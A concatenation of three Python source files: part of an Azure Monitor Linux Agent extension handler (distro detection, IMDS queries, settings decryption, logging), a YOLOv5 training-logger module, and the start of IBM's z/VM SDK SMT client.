msiauthurl = arc_endpoint + "/metadata/identity/oauth2/token?api-version=2019-11-01&resource=https://monitor.azure.com/"
req = urllib.request.Request(msiauthurl, headers={'Metadata':'true'})
res = urllib.request.urlopen(req)
except:
# The above request is expected to fail and add a key to the path
authkey_dir = "/var/opt/azcmagent/tokens/"
if not os.path.exists(authkey_dir):
raise Exception("Unable to find the auth key file at {0} returned from the arc msi auth request.".format(authkey_dir))
# Copy the tokens to mdsd accessible dir
for filename in os.listdir(authkey_dir):
filepath = authkey_dir + filename
print(filepath)
shutil.copy(filepath, arc_token_mdsd_dir)
# Change the ownership of the mdsd arc token dir to be accessible by syslog (since mdsd runs as syslog user)
os.system("chown -R syslog:syslog {0}".format(arc_token_mdsd_dir))
except Exception as e:
hutil_error('Error in arc watcher process while copying token for arc MSI auth queries. Exception={0}'.format(e))
finally:
time.sleep(sleepTime)
def parse_context(operation):
"""
Initialize a HandlerUtil object for this operation.
If the required modules have not been imported, this will return None.
"""
hutil = None
if ('Utils.WAAgentUtil' in sys.modules
and 'Utils.HandlerUtil' in sys.modules):
try:
logFileName = 'extension.log'
hutil = HUtil.HandlerUtility(waagent.Log, waagent.Error, logFileName=logFileName)
hutil.do_parse_context(operation)
# parse_context may throw KeyError if necessary JSON key is not
# present in settings
except KeyError as e:
waagent_log_error('Unable to parse context with error: ' \
'{0}'.format(e))
raise ParameterMissingException
return hutil
def find_package_manager(operation):
"""
Checks if the dist is debian based or centos based and assigns the package manager accordingly
"""
global PackageManager, PackageManagerOptions, BundleFileName
dist, ver = find_vm_distro(operation)
dpkg_set = set(["debian", "ubuntu"])
rpm_set = set(["oracle", "redhat", "centos", "red hat", "suse", "sles", "cbl-mariner"])
for dpkg_dist in dpkg_set:
if dist.lower().startswith(dpkg_dist):
PackageManager = "dpkg"
# OK to replace the /etc/default/azuremonitoragent, since the placeholders gets replaced again.
# Otherwise, the package manager prompts for action (Y/I/N/O/D/Z) [default=N]
PackageManagerOptions = "--force-overwrite --force-confnew"
BundleFileName = BundleFileNameDeb
break
for rpm_dist in rpm_set:
if dist.lower().startswith(rpm_dist):
PackageManager = "rpm"
# Same as above.
PackageManagerOptions = "--force"
BundleFileName = BundleFileNameRpm
break
if PackageManager == "":
log_and_exit(operation, UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" )
def find_vm_distro(operation):
"""
Finds the Linux Distribution this vm is running on.
"""
vm_dist = vm_id = vm_ver = None
parse_manually = False
try:
vm_dist, vm_ver, vm_id = platform.linux_distribution()
except AttributeError:
try:
vm_dist, vm_ver, vm_id = platform.dist()
except AttributeError:
hutil_log_info("Falling back to /etc/os-release distribution parsing")
# Some python versions *IF BUILT LOCALLY* (ex 3.5) give string responses (ex. 'bullseye/sid') to platform.dist() function
# This causes exception in the method below. Thus adding a check to switch to manual parsing in this case
try:
temp_vm_ver = int(vm_ver.split('.')[0])
except:
parse_manually = True
if (not vm_dist and not vm_ver) or parse_manually: # SLES 15 and others
try:
with open('/etc/os-release', 'r') as fp:
for line in fp:
if line.startswith('ID='):
vm_dist = line.split('=')[1]
vm_dist = vm_dist.split('-')[0]
vm_dist = vm_dist.replace('\"', '').replace('\n', '')
elif line.startswith('VERSION_ID='):
vm_ver = line.split('=')[1]
vm_ver = vm_ver.replace('\"', '').replace('\n', '')
except:
log_and_exit(operation, IndeterminateOperatingSystem, 'Indeterminate operating system')
return vm_dist, vm_ver
def is_vm_supported_for_extension(operation):
"""
Checks if the VM this extension is running on is supported by AzureMonitorAgent
Returns for platform.linux_distribution() vary widely in format, such as
'7.3.1611' returned for a VM with CentOS 7, so the first provided
digits must match
The supported distros of the AzureMonitorLinuxAgent are allowed to utilize
this VM extension. All other distros will get error code 51
"""
supported_dists = {'redhat' : ['6', '7', '8'], # Rhel
'centos' : ['6', '7', '8'], # CentOS
'red hat' : ['6', '7', '8'], # Oracle, RHEL
'oracle' : ['6', '7', '8'], # Oracle
'debian' : ['8', '9', '10'], # Debian
'ubuntu' : ['14.04', '16.04', '18.04', '20.04'], # Ubuntu
'suse' : ['12'], 'sles' : ['15'], # SLES
'cbl-mariner' : ['1'] # Mariner
}
vm_supported = False
vm_dist, vm_ver = find_vm_distro(operation)
# Find this VM distribution in the supported list
for supported_dist in list(supported_dists.keys()):
if not vm_dist.lower().startswith(supported_dist):
continue
# Check if this VM distribution version is supported
vm_ver_split = vm_ver.split('.')
for supported_ver in supported_dists[supported_dist]:
supported_ver_split = supported_ver.split('.')
# If vm_ver is at least as precise (at least as many digits) as
# supported_ver and matches all the supported_ver digits, then
# this VM is guaranteed to be supported
vm_ver_match = True
for idx, supported_ver_num in enumerate(supported_ver_split):
try:
supported_ver_num = int(supported_ver_num)
vm_ver_num = int(vm_ver_split[idx])
except IndexError:
vm_ver_match = False
break
if vm_ver_num != supported_ver_num:
vm_ver_match = False
break
if vm_ver_match:
vm_supported = True
break
if vm_supported:
break
return vm_supported, vm_dist, vm_ver
def exit_if_vm_not_supported(operation):
"""
Check if this VM distro and version are supported by the AzureMonitorLinuxAgent.
If VM is supported, find the package manager present in this distro
If this VM is not supported, log the proper error code and exit.
"""
vm_supported, vm_dist, vm_ver = is_vm_supported_for_extension(operation)
if not vm_supported:
log_and_exit(operation, UnsupportedOperatingSystem, 'Unsupported operating system: ' \
'{0} {1}'.format(vm_dist, vm_ver))
return 0
def is_arc_installed():
"""
Check if this is an Arc machine
"""
# Using systemctl to check this since Arc only supports VMs that have systemd
check_arc = os.system('systemctl status himdsd 1>/dev/null 2>&1')
return check_arc == 0
def get_arc_endpoint():
"""
Find the endpoint for Arc IMDS
"""
endpoint_filepath = '/lib/systemd/system.conf.d/azcmagent.conf'
endpoint = ''
try:
with open(endpoint_filepath, 'r') as f:
data = f.read()
endpoint = data.split("\"IMDS_ENDPOINT=")[1].split("\"\n")[0]
except:
hutil_log_error('Unable to load Arc IMDS endpoint from {0}'.format(endpoint_filepath))
return endpoint
def get_imds_endpoint():
"""
Find the appropriate endpoint (Azure or Arc) for IMDS
"""
azure_imds_endpoint = 'http://169.254.169.254/metadata/instance?api-version=2018-10-01'
if (is_arc_installed()):
hutil_log_info('Arc is installed, loading Arc-specific IMDS endpoint')
imds_endpoint = get_arc_endpoint()
if imds_endpoint:
imds_endpoint += '/metadata/instance?api-version=2019-08-15'
else:
# Fall back to the traditional IMDS endpoint; the cloud domain and VM
# resource id detection logic are resilient to failed queries to IMDS
imds_endpoint = azure_imds_endpoint
hutil_log_info('Falling back to default Azure IMDS endpoint')
else:
imds_endpoint = azure_imds_endpoint
hutil_log_info('Using IMDS endpoint "{0}"'.format(imds_endpoint))
return imds_endpoint
def get_azure_environment_and_region():
"""
Retreive the Azure environment and region from Azure or Arc IMDS
"""
imds_endpoint = get_imds_endpoint()
req = urllib.request.Request(imds_endpoint)
req.add_header('Metadata', 'True')
environment = region = None
try:
response = json.loads(urllib.request.urlopen(req).read())
if ('compute' in response):
if ('azEnvironment' in response['compute']):
environment = response['compute']['azEnvironment']
if ('location' in response['compute']):
region = response['compute']['location'].lower()
except urllib.error.HTTPError as e:
hutil_log_error('Request to Metadata service URL failed with an HTTPError: {0}'.format(e))
hutil_log_error('Response from Metadata service: {0}'.format(e.read()))
except:
hutil_log_error('Unexpected error from Metadata service')
return environment, region
def run_command_and_log(cmd, check_error = True, log_cmd = True):
"""
Run the provided shell command and log its output, including stdout and
stderr.
The output should not contain any PII, but the command might. In this case,
log_cmd should be set to False.
"""
exit_code, output = run_get_output(cmd, check_error, log_cmd)
if log_cmd:
hutil_log_info('Output of command "{0}": \n{1}'.format(cmd.rstrip(), output))
else:
hutil_log_info('Output: \n{0}'.format(output))
# also write output to STDERR since WA agent uploads that to Azlinux Kusto DB
# take only the last 100 characters as extension cuts off after that
try:
if exit_code != 0:
sys.stderr.write(output[-500:])
if "Permission denied" in output:
# Enable failures
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
except:
hutil_log_info('Failed to write output to STDERR')
return exit_code, output
def run_command_with_retries_output(cmd, retries, retry_check, final_check = None,
check_error = True, log_cmd = True,
initial_sleep_time = InitialRetrySleepSeconds,
sleep_increase_factor = 1):
"""
Caller provides a method, retry_check, to use to determine if a retry
should be performed. This must be a function with two parameters:
exit_code and output
The final_check can be provided as a method to perform a final check after
retries have been exhausted
Logic used: will retry up to retries times with initial_sleep_time in
between tries
If the retry_check retuns True for retry_verbosely, we will try cmd with
the standard -v verbose flag added
"""
try_count = 0
sleep_time = initial_sleep_time
run_cmd = cmd
run_verbosely = False
while try_count <= retries:
if run_verbosely:
run_cmd = cmd + ' -v'
exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd)
should_retry, retry_message, run_verbosely = retry_check(exit_code,
output)
if not should_retry:
break
try_count += 1
hutil_log_info(retry_message)
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if final_check is not None:
exit_code = final_check(exit_code, output)
return exit_code, output
def is_dpkg_locked(exit_code, output):
"""
If dpkg is locked, the output will contain a message similar to 'dpkg
status database is locked by another process'
"""
if exit_code != 0:
dpkg_locked_search = r'^.*dpkg.+lock.*$'
dpkg_locked_re = re.compile(dpkg_locked_search, re.M)
if dpkg_locked_re.search(output):
return True
return False
def retry_if_dpkg_locked(exit_code, output):
"""
Some commands fail because the package manager is locked (apt-get/dpkg
only); this will allow retries on failing commands.
"""
retry_verbosely = False
dpkg_locked = is_dpkg_locked(exit_code, output)
apt_get_exit_code, apt_get_output = run_get_output('which apt-get',
chk_err = False,
log_cmd = False)
if dpkg_locked:
return True, 'Retrying command because package manager is locked.', \
retry_verbosely
else:
return False, '', False
def final_check_if_dpkg_locked(exit_code, output):
"""
If dpkg is still locked after the retries, we want to return a specific
error code
"""
dpkg_locked = is_dpkg_locked(exit_code, output)
if dpkg_locked:
exit_code = DPKGLockedErrorCode
return exit_code
def get_settings():
"""
Retrieve the configuration for this extension operation
"""
global SettingsDict
public_settings = None
protected_settings = None
if HUtilObject is not None:
public_settings = HUtilObject.get_public_settings()
protected_settings = HUtilObject.get_protected_settings()
elif SettingsDict is not None:
public_settings = SettingsDict['public_settings']
protected_settings = SettingsDict['protected_settings']
else:
SettingsDict = {}
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
seq_no = get_latest_seq_no()
settings_path = os.path.join(config_dir, '{0}.settings'.format(seq_no))
try:
with open(settings_path, 'r') as settings_file:
settings_txt = settings_file.read()
settings = json.loads(settings_txt)
h_settings = settings['runtimeSettings'][0]['handlerSettings']
public_settings = h_settings['publicSettings']
SettingsDict['public_settings'] = public_settings
except:
hutil_log_error('Unable to load handler settings from ' \
'{0}'.format(settings_path))
if ('protectedSettings' in h_settings
and 'protectedSettingsCertThumbprint' in h_settings
and h_settings['protectedSettings'] is not None
and h_settings['protectedSettingsCertThumbprint'] is not None):
encoded_settings = h_settings['protectedSettings']
settings_thumbprint = h_settings['protectedSettingsCertThumbprint']
encoded_cert_path = os.path.join('/var/lib/waagent',
'{0}.crt'.format(
settings_thumbprint))
encoded_key_path = os.path.join('/var/lib/waagent',
'{0}.prv'.format(
settings_thumbprint))
decoded_settings = base64.standard_b64decode(encoded_settings)
decrypt_cmd = 'openssl smime -inform DER -decrypt -recip {0} ' \
'-inkey {1}'.format(encoded_cert_path,
encoded_key_path)
try:
session = subprocess.Popen([decrypt_cmd], shell = True,
stdin = subprocess.PIPE,
stderr = subprocess.STDOUT,
stdout = subprocess.PIPE)
output = session.communicate(decoded_settings)
except OSError:
pass
protected_settings_str = output[0]
if protected_settings_str is None:
log_and_exit('Enable', 1, 'Failed decrypting ' \
'protectedSettings')
protected_settings = ''
try:
protected_settings = json.loads(protected_settings_str)
except:
hutil_log_error('JSON exception decoding protected settings')
SettingsDict['protected_settings'] = protected_settings
return public_settings, protected_settings
def update_status_file(operation, exit_code, exit_status, message):
"""
Mimic HandlerUtil method do_status_report in case hutil method is not
available
Write status to status file
"""
handler_env = get_handler_env()
try:
extension_version = str(handler_env['version'])
status_dir = str(handler_env['handlerEnvironment']['statusFolder'])
except:
extension_version = "1.0"
status_dir = os.path.join(os.getcwd(), 'status')
status_txt = [{
"version" : extension_version,
"timestampUTC" : time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
"status" : {
"name" : "Microsoft.Azure.Monitor.AzureMonitorLinuxAgent",
"operation" : operation,
"status" : exit_status,
"code" : exit_code,
"formattedMessage" : {
"lang" : "en-US",
"message" : message
}
}
}]
status_json = json.dumps(status_txt)
# Find the most recently changed config file and then use the
# corresponding status file
latest_seq_no = get_latest_seq_no()
status_path = os.path.join(status_dir, '{0}.status'.format(latest_seq_no))
status_tmp = '{0}.tmp'.format(status_path)
with open(status_tmp, 'w+') as tmp_file:
tmp_file.write(status_json)
os.rename(status_tmp, status_path)
def get_handler_env():
"""
Set and retrieve the contents of HandlerEnvironment.json as JSON
"""
global HandlerEnvironment
if HandlerEnvironment is None:
handler_env_path = os.path.join(os.getcwd(), 'HandlerEnvironment.json')
try:
with open(handler_env_path, 'r') as handler_env_file:
handler_env_txt = handler_env_file.read()
handler_env = json.loads(handler_env_txt)
if type(handler_env) == list:
handler_env = handler_env[0]
HandlerEnvironment = handler_env
except Exception as e:
waagent_log_error(str(e))
return HandlerEnvironment
def get_latest_seq_no():
"""
Determine the latest operation settings number to use
"""
global SettingsSequenceNumber
if SettingsSequenceNumber is None:
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
latest_seq_no = -1
cur_seq_no = -1
latest_time = None
try:
for dir_name, sub_dirs, file_names in os.walk(config_dir):
for file_name in file_names:
file_basename = os.path.basename(file_name)
match = re.match(r'[0-9]{1,10}\.settings', file_basename)
if match is None:
continue
cur_seq_no = int(file_basename.split('.')[0])
file_path = os.path.join(config_dir, file_name)
cur_time = os.path.getmtime(file_path)
if latest_time is None or cur_time > latest_time:
latest_time = cur_time
latest_seq_no = cur_seq_no
except:
pass
if latest_seq_no < 0:
latest_seq_no = 0
SettingsSequenceNumber = latest_seq_no
return SettingsSequenceNumber
def run_get_output(cmd, chk_err = False, log_cmd = True):
"""
Mimic waagent mothod RunGetOutput in case waagent is not available
Run shell command and return exit code and output
"""
if 'Utils.WAAgentUtil' in sys.modules:
# WALinuxAgent-2.0.14 allows only 2 parameters for RunGetOutput
# If checking the number of parameters fails, pass 2
try:
sig = inspect.signature(waagent.RunGetOutput)
params = sig.parameters
waagent_params = len(params)
except:
try:
spec = inspect.getargspec(waagent.RunGetOutput)
params = spec.args
waagent_params = len(params)
except:
waagent_params = 2
if waagent_params >= 3:
exit_code, output = waagent.RunGetOutput(cmd, chk_err, log_cmd)
else:
exit_code, output = waagent.RunGetOutput(cmd, chk_err)
else:
try:
output = subprocess.check_output(cmd, stderr = subprocess.STDOUT,
shell = True)
exit_code = 0
except subprocess.CalledProcessError as e:
exit_code = e.returncode
output = e.output
output = output.encode('utf-8')
# On python 3, encode returns a byte object, so we must decode back to a string
if sys.version_info >= (3,):
output = output.decode('utf-8', 'ignore')
return exit_code, output.strip()
def init_waagent_logger():
"""
Initialize waagent logger
If waagent has not been imported, catch the exception
"""
try:
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout', True)
except Exception as e:
print('Unable to initialize waagent log because of exception ' \
'{0}'.format(e))
def waagent_log_info(message):
"""
Log informational message, being cautious of possibility that waagent may
not be imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Log(message)
else:
print('Info: {0}'.format(message))
def waagent_log_error(message):
"""
Log error message, being cautious of possibility that waagent may not be
imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Error(message)
else:
print('Error: {0}'.format(message))
def hutil_log_info(message):
"""
Log informational message, being cautious of possibility that hutil may
not be imported and configured
"""
if HUtilObject is not None:
HUtilObject.log(message)
else:
print('Info: {0}'.format(message))
def hutil_log_error(message):
"""
Log error message, being cautious of possibility that hutil may not be
imported and configured
"""
if HUtilObject is not None:
HUtilObject.error(message)
else:
print('Error: {0}'.format(message))
def log_and_exit(operation, exit_code = 1, message = ''):
"""
Log the exit message and perform the exit
"""
if exit_code == 0:
waagent_log_info(message)
hutil_log_info(message)
exit_status = 'success'
else:
waagent_log_error(message)
hutil_log_error(message)
exit_status = 'failed'
if HUtilObject is not None:
HUtilObject.do_exit(exit_code, operation, exit_status, str(exit_code),
message)
else:
update_status_file(operation, str(exit_code), exit_status, message)
sys.exit(exit_code)
# Exceptions
# If these exceptions are expected to be caught by the main method, they
# include an error_code field with an integer with which to exit from main
class AzureMonitorAgentForLinuxException(Exception):
"""
Base exception class for all exceptions; as such, its error code is the
basic error code traditionally returned in Linux: 1
"""
error_code = 1
def get_error_message(self, operation):
"""
Return a descriptive error message based on this type of exception
"""
return '{0} failed with exit code {1}'.format(operation,
self.error_code)
class ParameterMissingException(AzureMonitorAgentForLinuxException):
"""
There is a missing parameter for the AzureMonitorLinuxAgent Extension
"""
error_code = MissingorInvalidParameterErrorCode
def get_error_message(self, operation):
return '{0} failed due to a missing parameter: {1}'.format(operation,
self)
if __name__ == '__main__' :
main()
|
__init__.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Logging utils
"""
import warnings
from threading import Thread
import torch
from torch.utils.tensorboard import SummaryWriter
from utils.general import colorstr, emojis
from utils.loggers.wandb.wandb_utils import WandbLogger
from utils.plots import plot_images, plot_results
from utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb') # text-file, TensorBoard, Weights & Biases
try:
import wandb
assert hasattr(wandb, '__version__') # verify package import not local dir
except (ImportError, AssertionError):
wandb = None
class Loggers():
# YOLOv5 Loggers class
def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, logger=None, include=LOGGERS):
self.save_dir = save_dir
self.weights = weights
self.opt = opt
self.hyp = hyp
self.logger = logger # for printing results to console
self.include = include
self.keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', # metrics
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for k in LOGGERS:
setattr(self, k, None) # init empty logger dictionary
self.csv = True # always log to csv
# Message
if not wandb:
prefix = colorstr('Weights & Biases: ')
s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
print(emojis(s))
# TensorBoard
s = self.save_dir
if 'tb' in self.include and not self.opt.evolve:
prefix = colorstr('TensorBoard: ')
self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
self.tb = SummaryWriter(str(s))
# W&B
if wandb and 'wandb' in self.include:
wandb_artifact_resume = isinstance(self.opt.resume, str) and self.opt.resume.startswith('wandb-artifact://')
run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume and not wandb_artifact_resume else None
self.opt.hyp = self.hyp # add hyperparameters
self.wandb = WandbLogger(self.opt, run_id)
else:
self.wandb = None
def on_pretrain_routine_end(self):
# Callback runs on pre-train routine end
paths = self.save_dir.glob('*labels*.jpg') # training labels
if self.wandb:
self.wandb.log({"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]})
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
# Callback runs on train batch end
if plots:
if ni == 0:
if not sync_bn: # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [wandb.Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_image_end(self, pred, predn, path, names, im):
# Callback runs on val image end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob('val*.jpg'))
self.wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in files]})
def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
# Callback runs at the end of each fit (train+val) epoch
x = {k: v for k, v in zip(self.keys, vals)} # dict
if self.csv:
file = self.save_dir / 'results.csv'
n = len(x) + 1 # number of cols
s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + self.keys)).rstrip(',') + '\n') # add header
with open(file, 'a') as f:
f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch)
if self.wandb:
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots, epoch):
# Callback runs on training end
if plots:
plot_results(file=self.save_dir / 'results.csv') # save results.png
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()] # filter
if self.tb:
import cv2
for f in files:
self.tb.add_image(f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats='HWC')
if self.wandb:
self.wandb.log({"Results": [wandb.Image(str(f), caption=f.name) for f in files]})
# Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
if not self.opt.evolve:
wandb.log_artifact(str(best if best.exists() else last), type='model',
name='run_' + self.wandb.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
self.wandb.finish_run()
else:
self.wandb.finish_run()
self.wandb = WandbLogger(self.opt)
|
smtclient.py
|
# Copyright 2017,2020 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import hashlib
import math
# On SLES12, we found that if you import urllib.parse later
# than requests, you will find a error like 'not able to load
# urllib.parse, this is because urllib will be in sys.modules
# when first import requests
# as workaround here, we first import urllib then import requests
# later, we need consider to use urllib.request to replace
# requests if that's possible to avoid this kind of issue
from io import IOBase
import shutil
import six.moves.urllib.parse as urlparse
import requests
import threading
import os
import re
import six
import string
import subprocess
import tempfile
import time
from smtLayer import smt
from zvmsdk import config
from zvmsdk import constants as const
from zvmsdk import database
from zvmsdk import exception
from zvmsdk import log
from zvmsdk import returncode
from zvmsdk import utils as zvmutils
CONF = config.CONF
LOG = log.LOG
_LOCK = threading.Lock()
CHUNKSIZE = 4096
_SMT_CLIENT = None
def get_smtclient():
global _SMT_CLIENT
if _SMT_CLIENT is None:
try:
_SMT_CLIENT = zvmutils.import_object(
'zvmsdk.smtclient.SMTClient')
except ImportError:
LOG.error("Unable to get smtclient")
raise ImportError
return _SMT_CLIENT
class SMTClient(object):
def __init__(self):
self._smt = smt.SMT()
self._pathutils = zvmutils.PathUtils()
self._NetDbOperator = database.NetworkDbOperator()
self._GuestDbOperator = database.GuestDbOperator()
self._ImageDbOperator = database.ImageDbOperator()
def _request(self, requestData):
try:
results = self._smt.request(requestData)
except Exception as err:
LOG.error('SMT internal parse encounter error')
raise exception.SDKInternalError(msg=err, modID='smt')
def _is_smt_internal_error(results):
internal_error_list = returncode.SMT_INTERNAL_ERROR
for error in internal_error_list:
if results['overallRC'] != error[0]:
# overallRC does not match, continue next
continue
if error[1] is not None and results['rc'] != error[1]:
# rc match failed
continue
if error[2] is not None and results['rs'] not in error[2]:
# rs match failed
continue
# All match finish successfully, return true
return True
return False
if results['overallRC'] != 0:
results.pop('logEntries')
# Check whether this smt error belongs to internal error, if so,
# raise internal error, otherwise raise clientrequestfailed error
if _is_smt_internal_error(results):
msg = "SMT internal error. Results: %s" % str(results)
LOG.error(msg)
raise exception.SDKInternalError(msg=msg,
modID='smt',
results=results)
else:
msg = ("SMT request failed. RequestData: '%s', Results: '%s'"
% (requestData, str(results)))
raise exception.SDKSMTRequestFailed(results, msg)
return results
def get_guest_temp_path(self, userid):
return self._pathutils.get_guest_temp_path(userid)
def get_guest_path(self, userid):
return self._pathutils.get_guest_path(userid)
def clean_temp_folder(self, tmp_folder):
return self._pathutils.clean_temp_folder(tmp_folder)
def _generate_vdev(self, base, offset):
"""Generate virtual device number based on base vdev
:param base: base virtual device number, string of 4 bit hex.
:param offset: offset to base, integer.
"""
vdev = hex(int(base, 16) + offset)[2:]
return vdev.rjust(4, '0')
def _generate_increasing_nic_id(self, nic_id):
"""Generate increasing nic id string
:param nic_id: hexadecimal nic id like '1000'
:return: increasing nic id, string like '0.0.1000,0.0.1001,0.0.1002'
"""
nic_id = str(hex(int(nic_id, 16)))[2:]
nic_id_1 = str(hex(int(nic_id, 16) + 1))[2:]
nic_id_2 = str(hex(int(nic_id, 16) + 2))[2:]
if len(nic_id_2) > 4:
errmsg = ("Virtual device number %s is not valid" % nic_id_2)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return "0.0.%s,0.0.%s,0.0.%s" % (nic_id, nic_id_1, nic_id_2)
def generate_disk_vdev(self, start_vdev=None, offset=0):
"""Generate virtual device number for disks
:param offset: offset of user_root_vdev.
:return: virtual device number, string of 4 bit hex.
"""
if not start_vdev:
start_vdev = CONF.zvm.user_root_vdev
vdev = self._generate_vdev(start_vdev, offset)
if offset >= 0 and offset < 254:
return vdev
else:
msg = ("Failed to generate disk vdev, invalid virtual device"
"number for disk:%s" % vdev)
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
def add_mdisks(self, userid, disk_list, start_vdev=None):
"""Add disks for the userid
:disks: A list dictionary to describe disk info, for example:
disk: [{'size': '1g',
'format': 'ext3',
'disk_pool': 'ECKD:eckdpool1'},
{'size': '1g',
'format': 'ext3'}]
"""
# Firstly, check disk_pool in disk_list, if disk_pool not specified
# and not configured(the default vaule is None), report error
# report error
for idx, disk in enumerate(disk_list):
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
disk['disk_pool'] = disk_pool
if disk_pool is None:
msg = ('disk_pool not configured for sdkserver.')
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
for idx, disk in enumerate(disk_list):
if 'vdev' in disk:
# this means user want to create their own device number
vdev = disk['vdev']
else:
vdev = self.generate_disk_vdev(start_vdev=start_vdev,
offset=idx)
self._add_mdisk(userid, disk, vdev)
disk['vdev'] = vdev
sizeUpper = disk.get('size').strip().upper()
sizeUnit = sizeUpper[-1]
if sizeUnit != 'G' and sizeUnit != 'M':
sizeValue = sizeUpper
disk_pool = disk.get('disk_pool')
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
# Convert the cylinders to bytes
convert = 737280
else:
# Convert the blocks to bytes
convert = 512
byteSize = float(float(int(sizeValue) * convert / 1024) / 1024)
unit = "M"
if (byteSize > 1024):
byteSize = float(byteSize / 1024)
unit = "G"
byteSize = "%.1f" % byteSize
disk['size'] = byteSize + unit
return disk_list
def remove_mdisks(self, userid, vdev_list):
for vdev in vdev_list:
self._remove_mdisk(userid, vdev)
def dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
:raddr: A real device number to be dedicated or attached
to the specified image
:mode: Specify a 1 if the virtual device is to be in read-only mode.
Otherwise, specify a 0.
"""
# dedicate device to directory entry
self._dedicate_device(userid, vaddr, raddr, mode)
def _dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device."""
action = 'dedicate'
rd = ('changevm %(uid)s %(act)s %(va)s %(ra)s %(mod)i' %
{'uid': userid, 'act': action,
'va': vaddr, 'ra': raddr, 'mod': mode})
action = "dedicate device to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_fcp_info_by_status(self, userid, status):
"""get fcp information by the status.
:userid: The name of the image to query fcp info
:status: The status of target fcps. eg:'active', 'free' or 'offline'.
"""
results = self._get_fcp_info_by_status(userid, status)
return results
def _get_fcp_info_by_status(self, userid, status):
action = 'fcpinfo'
rd = ' '.join(['getvm', userid, action, status])
action = "query fcp info of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return results['response']
def undedicate_device(self, userid, vaddr):
"""undedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
"""
# undedicate device to directory entry
self._undedicate_device(userid, vaddr)
def _undedicate_device(self, userid, vaddr):
"""undedicate device."""
action = 'undedicate'
rd = ('changevm %(uid)s %(act)s %(va)s' %
{'uid': userid, 'act': action,
'va': vaddr})
action = "undedicate device from userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_image_performance_info(self, userid):
"""Get CPU and memory usage information.
:userid: the zvm userid to be queried
"""
pi_dict = self.image_performance_query([userid])
return pi_dict.get(userid, None)
def get_adapters_info(self, userid):
rd = ' '.join((
